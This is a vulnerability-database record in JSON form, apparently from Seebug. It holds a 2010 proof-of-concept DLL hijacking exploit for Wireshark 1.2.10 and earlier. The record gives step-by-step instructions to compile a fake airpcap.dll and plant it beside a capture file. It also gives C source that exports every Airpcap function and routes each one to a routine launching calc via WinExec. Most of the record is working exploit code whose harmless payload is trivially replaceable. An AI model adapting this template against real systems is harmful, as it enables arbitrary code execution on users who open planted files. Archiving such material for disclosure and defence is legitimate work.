DATABASE RESOURCES PRICING ABOUT US

{"sourceData": "\n /*\r\nExploit Title: Wireshark <= 1.2.10 DLL Hijacking Exploit (airpcap.dll)\r\nDate: 24/08/2010\r\nAuthor: TheLeader\r\nEmail: gsog2009 [a7] hotmail [d0t] com\r\nSoftware Link: http://www.wireshark.org/download.html\r\nVersion: 1.2.10 and prior\r\nTested on: Windows 7 x86 (6.1.7600)\r\n\r\nAs seen on Metasploit blog (rock on HDM!): \r\nhttp://blog.metasploit.com/2010/08/exploiting-dll-hijacking-flaws.html\r\n\r\nProbably gonna see alot of these bugs getting exploited in the near future..\r\n\r\nCompile and rename to airpcap.dll, create a file in the same dir with one of the following extensions.\r\n\r\nDefault Wireshark file extension associations:\r\n.5vw / .acp / .apc / .atc / .bfr / .cap / .enc / .erf / .fdc / .pcap / .pcapng /\r\n.pkt / .rf5 / .snoop / .syc / .tpc / .tr1 / .trace / .trc / .wpc / .wpz\r\n\r\nDouble click & watch a nice calculator pop =]\r\nShouts to all the great guys at forums.hacking.org.il\r\n*/\r\n\r\n#include <windows.h>\r\n#define DLLIMPORT __declspec (dllexport)\r\n\r\nDLLIMPORT void AirpcapGetDeviceList() { evil(); }\r\nDLLIMPORT void AirpcapFreeDeviceList() { evil(); }\r\nDLLIMPORT void AirpcapOpen() { evil(); }\r\nDLLIMPORT void AirpcapClose() { evil(); }\r\nDLLIMPORT void AirpcapGetLinkType() { evil(); }\r\nDLLIMPORT void AirpcapSetLinkType() { evil(); }\r\nDLLIMPORT void AirpcapSetKernelBuffer() { evil(); }\r\nDLLIMPORT void AirpcapSetFilter() { evil(); }\r\nDLLIMPORT void AirpcapGetMacAddress() { evil(); }\r\nDLLIMPORT void AirpcapSetMinToCopy() { evil(); }\r\nDLLIMPORT void AirpcapGetReadEvent() { evil(); }\r\nDLLIMPORT void AirpcapRead() { evil(); }\r\nDLLIMPORT void AirpcapGetStats() { evil(); }\r\nDLLIMPORT void AirpcapTurnLedOn() { evil(); }\r\nDLLIMPORT void AirpcapTurnLedOff() { evil(); }\r\nDLLIMPORT void AirpcapGetDeviceChannel() { evil(); }\r\nDLLIMPORT void AirpcapSetDeviceChannel() { evil(); }\r\nDLLIMPORT void AirpcapGetFcsPresence() { evil(); }\r\nDLLIMPORT void AirpcapSetFcsPresence() { evil(); }\r\nDLLIMPORT void AirpcapGetFcsValidation() { evil(); }\r\nDLLIMPORT void AirpcapSetFcsValidation() { evil(); }\r\nDLLIMPORT void AirpcapGetDeviceKeys() { evil(); }\r\nDLLIMPORT void AirpcapSetDeviceKeys() { evil(); }\r\nDLLIMPORT void AirpcapGetDecryptionState() { evil(); }\r\nDLLIMPORT void AirpcapSetDecryptionState() { evil(); }\r\nDLLIMPORT void AirpcapStoreCurConfigAsAdapterDefault() { evil(); }\r\nDLLIMPORT void AirpcapGetVersion() { evil(); }\r\nDLLIMPORT void AirpcapGetDriverDecryptionState() { evil(); }\r\nDLLIMPORT void AirpcapSetDriverDecryptionState() { evil(); }\r\nDLLIMPORT void AirpcapGetDriverKeys() { evil(); }\r\nDLLIMPORT void AirpcapSetDriverKeys() { evil(); }\r\nDLLIMPORT void AirpcapSetDeviceChannelEx() { evil(); }\r\nDLLIMPORT void AirpcapGetDeviceChannelEx() { evil(); }\r\nDLLIMPORT void AirpcapGetDeviceSupportedChannels() { evil(); }\r\n\r\nint evil()\r\n{\r\n WinExec("calc", 0);\r\n exit(0);\r\n return 0;\r\n}\r\n\n ", "status": "poc", "description": "No description provided by source.", "sourceHref": "https://www.seebug.org/vuldb/ssvid-20061", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-20061", "type": "seebug", "viewCount": 3, "references": [], "lastseen": "2017-11-19T18:08:51", "published": "2010-08-24T00:00:00", "cvelist": [], "id": "SSV:20061", "enchantments_done": [], "modified": "2010-08-24T00:00:00", "title": "Wireshark <= 1.2.10 DLL Hijacking Exploit (airpcap.dll)", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 0.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.0}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647903805}}

{}